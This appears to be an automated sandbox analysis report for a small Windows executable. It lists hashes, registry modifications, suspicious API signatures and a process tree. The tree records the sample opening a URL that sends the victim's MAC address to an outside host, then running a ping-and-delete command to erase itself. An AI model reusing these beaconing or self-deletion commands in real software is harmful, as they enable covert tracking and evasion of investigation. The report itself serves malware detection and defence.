Analysis
-
max time kernel
148s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 15:51
Static task
static1
Behavioral task
behavioral1
Sample
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe
Resource
win10v2004-20221111-en
General
-
Target
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe
-
Size
7KB
-
MD5
5288fcc3065c5240abaefe610f39b770
-
SHA1
540eba9bbba6a280788f4456b9bf8922fc6b67c1
-
SHA256
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6
-
SHA512
f5f29dd292248c29b5c3d7ab9b0d9975001da1c1121d60462ba335e1f75e55e0acba1d246df357b0461076092a2098c8aef25113beb2057ac49fe49e145e9dfe
-
SSDEEP
96:/lxsUbrTEMmh25eX/cOV5IVlZQmyIBiMPIBD2QN8whtqZ+oH1FjcGzC82k6GpZ6L:/TW/25EcOfogmfiMHzwi3/H2kWn3
Malware Config
Signatures
-
Processes:
IEXPLORE.EXEIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "375991744" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f00000000020000000000106600000001000020000000ae144e65d207cd620627f133860f09285b606d1f8c9b015a5ddd97608beb7711000000000e800000000200002000000039db1931caf625b46ab0253dcd5a93c109254444c1aa06d1861f418f740835632000000006473381f3fcd07be7d66295a6f799cedc9ec372fa540fd8760622bd055409cd40000000772d3807d04dc91df0b48ac4771f6536c184e27e5d905f089d3baf4bfeb2f791da462f793f63c9652c1ea61d30df8df669a90622720ee37aa65ae542778975f4 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{67EB2D5F-6B59-11ED-B8D8-D668443210E4} = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cd62b78ee8587e4dac88ae50a840a17f000000000200000000001066000000010000200000006f185983a7ebdb012264df538d71e37bbe5d749209563d875dad25bd4b94f7f4000000000e80000000020000200000006333ac331d1566d616790d35a9aea1d6ce1260edffaca156f42bde5d063eca0f2000000039fbd43009c84f703302757b0abde1e81c0daf6216b734b70fff8e1160dd92b4400000008204ee3379282b27bc7c00c0f25e5ddfd10a6a3b3865f261e431158f1c2eb6612ed16e3095ec3b4eb8061ec3ef06fbed6bb64c18b0589f7d8d63d8cbf12b4cdb IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f019784766ffd801 IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 1017354a66ffd801 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4060001867-1434967833-2212371794-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
IEXPLORE.EXEpid process 1572 IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
IEXPLORE.EXEpid process 1572 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exeIEXPLORE.EXEIEXPLORE.EXEpid process 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe 1572 IEXPLORE.EXE 1572 IEXPLORE.EXE 1120 IEXPLORE.EXE 1120 IEXPLORE.EXE 1120 IEXPLORE.EXE 1120 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exeIEXPLORE.EXEcmd.exedescription pid process target process PID 1796 wrote to memory of 1572 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe IEXPLORE.EXE PID 1796 wrote to memory of 1572 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe IEXPLORE.EXE PID 1572 wrote to memory of 1120 1572 IEXPLORE.EXE IEXPLORE.EXE PID 1572 wrote to memory of 1120 1572 IEXPLORE.EXE IEXPLORE.EXE PID 1572 wrote to memory of 1120 1572 IEXPLORE.EXE IEXPLORE.EXE PID 1796 wrote to memory of 984 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe cmd.exe PID 1796 wrote to memory of 984 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe cmd.exe PID 1796 wrote to memory of 984 1796 895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe cmd.exe PID 984 wrote to memory of 1080 984 cmd.exe PING.EXE PID 984 wrote to memory of 1080 984 cmd.exe PING.EXE PID 984 wrote to memory of 1080 984 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe"C:\Users\Admin\AppData\Local\Temp\895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.dh123.org/tongji/g.asp?mac=D6:68:44:32:10:E4&id=admin2⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1572 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1120 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 && del "C:\Users\Admin\AppData\Local\Temp\895be7c5f53b29401bd4249f1fb87197def132f43b64abcc613e68e81c9602c6.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- Runs ping.exe
PID:1080